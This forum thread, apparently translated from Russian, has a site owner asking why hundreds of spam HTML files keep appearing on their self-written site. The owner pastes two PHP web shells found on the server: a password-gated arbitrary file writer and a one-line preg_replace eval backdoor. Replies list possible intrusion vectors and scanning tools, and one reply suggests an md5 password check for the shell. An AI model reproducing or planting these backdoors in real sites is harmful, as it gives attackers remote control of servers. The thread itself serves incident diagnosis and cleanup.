Answer the question
In order to leave comments, you need to log in
U
U
Uzair Izha2016-04-01 01:24:36
Uzair Izha, 2016-04-01 01:24:36
Hacking the site, how to understand why this happens?
I made a website, the fact is that from time to time more than 500 html files of some kind of Chinese online store appear at the root of the site. With what it can be connected? What kind of security flaws does this produce? the site is self-written, it has nothing special in itself, except for articles. The files seem to be uploaded to the server. HTML files of this kind 001_shop_eKxk.html
There are also foreign folders, there I found a php file
<?php
//header("Content-Type: text/html; charset=utf-8");
$config_password="yt";
$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$folderpath=$_REQUEST['folderpath'];
$filename=$_REQUEST['filename'];
$body=stripslashes($_REQUEST['body']);
if($password==""||$filename==""||$body=="")
{
echo 'parameters error!';
return;
}
if($password!=$config_password)
{
echo 'password error!';
return;
}
$rootPath=$_SERVER['DOCUMENT_ROOT'];
$newPath=$rootPath;
if($folderpath!="")
{
if($folderpath=="root")
{
$newPath=$rootPath.'/'.$filename;
}
else
{
createFolder($rootPath.'/'.$folderpath);
$newPath=$rootPath.'/'.$folderpath.'/'.$filename;
}
}
else
{
$newPath=$filename;
}
$fp=fopen($newPath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,$body);
fclose($fp);
if(file_exists($newPath))
{
echo "publish success & uploaded";
}
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777);
}
}
?>or here's another
<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['yt']."')", "laterain testin9"); ?> 6 answer(s)
@wielski
@archakov06
@index0h
You have been hacked.
Question from the series: "What did I do wrong?".
These can be:
* Access based on popular usernames/passwords
* Stealing the admin password via XSS
* Weakly secure FTP/SFTP
* SQL injections
* Uploaded files have the right to execute
* Uploaded files can be included in the main code
* CMS site with enabled debug mode
* met cases of hacking "from the inside" when the hacker is a colleague
* perhaps the hoster was actually hacked, and you were just unlucky
* open ports of trusted services stick out outside: mysql, memcached, redis,...
* ...
See the logs, maybe it will be useful
@Chvalov
@trevoga_su
least
@MrGroovy
Most likely, you configured some of the site components incorrectly. There are many options, here are the main ones:
You should not rule out the possibility of an exploit due to outdated software versions (ssh, ftp) yet.
You need to understand that changing passwords and deleting third-party files is a temporary measure. You will be hacked until you close the security holes in the site. I would recommend using a broad profile scanner that checks the site in all directions at once. Of the online options, there are METASCAN or Acunetix.
And I also advise you to read the PHP security manual https://www.php.net/manual/en/security.php
A
Andrzej Wielski, 2016-04-01 @wielski
https://yandex.ru/promo/manul#about
Use it, check the site for shells and other evil spirits.
A
Archakov Dennis, 2016-04-01 @archakov06
There is a wonderful utility aiBolit . I advise them to scan the site (website folder).
1. Perhaps your FTP was broken.
2. the shell was uploaded through some kind of plugin
3. the site that is located on the same server as your site was hacked.
I
index0h, 2016-04-01 @index0h
With what it can be connected?
You have been hacked.
Question from the series: "What did I do wrong?".
These can be:
* Access based on popular usernames/passwords
* Stealing the admin password via XSS
* Weakly secure FTP/SFTP
* SQL injections
* Uploaded files have the right to execute
* Uploaded files can be included in the main code
* CMS site with enabled debug mode
* met cases of hacking "from the inside" when the hacker is a colleague
* perhaps the hoster was actually hacked, and you were just unlucky
* open ports of trusted services stick out outside: mysql, memcached, redis,...
* ...
See the logs, maybe it will be useful
C
Chvalov, 2016-04-01 @Chvalov
Perhaps they break through a neighboring site
. Do you have a hosting or your own VPS / VDS?
T
trevoga_su, 2016-04-01 @trevoga_su
$config_password="......";
// где .... - md5() от какого-нибудь сложного пароля. что бы по справочникам md5 не найтиif(md5($password) != $config_password)
{ // ....least
M
MrGroovy, 2020-12-03 @MrGroovy
You have been hacked and your site is most likely being used for fraud.
You need to remove all third-party files from the site, ideally it is better to restore it from a backup. Change all passwords and scan files, just in case, for malware.
With what it can be connected? What kind of security flaws does this produce?
Most likely, you configured some of the site components incorrectly. There are many options, here are the main ones:
- File permission misconfiguration (Security Misconfiguration)
- Database access vulnerabilities (SQL-Injectionn)
- Weak passwords (Brute Force)
- Cross Site Scripting (XSS)
You should not rule out the possibility of an exploit due to outdated software versions (ssh, ftp) yet.
You need to understand that changing passwords and deleting third-party files is a temporary measure. You will be hacked until you close the security holes in the site. I would recommend using a broad profile scanner that checks the site in all directions at once. Of the online options, there are METASCAN or Acunetix.
And I also advise you to read the PHP security manual https://www.php.net/manual/en/security.php
Similar questions
E
A
R
F
R
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question